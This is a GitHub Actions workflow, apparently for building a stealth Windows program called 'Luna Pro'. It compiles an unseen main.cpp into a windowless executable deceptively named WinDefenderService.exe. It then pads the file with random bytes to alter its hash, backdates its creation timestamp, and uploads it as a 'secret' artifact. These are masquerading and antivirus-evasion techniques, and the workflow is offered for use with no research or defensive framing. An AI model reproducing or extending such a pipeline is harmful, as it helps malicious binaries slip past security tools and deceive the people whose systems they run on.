name: Build Luna Pro Stealth

on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: windows-latest
    steps:
    - uses: actions/checkout@v4

    # --- KRİTİK DÜZELTME ADIMI: cl.exe'yi aktif eder ---
    - name: Add MSBuild to PATH
      uses: microsoft/setup-msbuild@v2

    - name: Setup MSVC
      uses: ilammy/msvc-dev-cmd@v1
    # --------------------------------------------------

    - name: Get Libraries
      run: |
        Invoke-WebRequest -Uri https://raw.githubusercontent.com/yhirose/cpp-httplib/master/httplib.h -OutFile httplib.h

    - name: Compile with Optimization
      run: |
        # Artık cl.exe tanınacak
        cl.exe /EHsc /O2 /MT main.cpp /Fe:WinDefenderService.exe /link user32.lib ws2_32.lib advapi32.lib /subsystem:windows

    - name: Advanced Masking
      run: |
        $exe = "WinDefenderService.exe"
        $randSize = Get-Random -Minimum 1048576 -Maximum 3145728
        $junk = New-Object Byte[] $randSize
        (New-Object Random).NextBytes($junk)
        Add-Content -Path $exe -Value $junk -Encoding Byte
        (Get-Item $exe).CreationTime = "2021-05-12 10:00:00"

    - name: Upload Secret Artifact
      uses: actions/upload-artifact@v4
      with:
        name: LunaPro_Binary
        path: WinDefenderService.exe
        
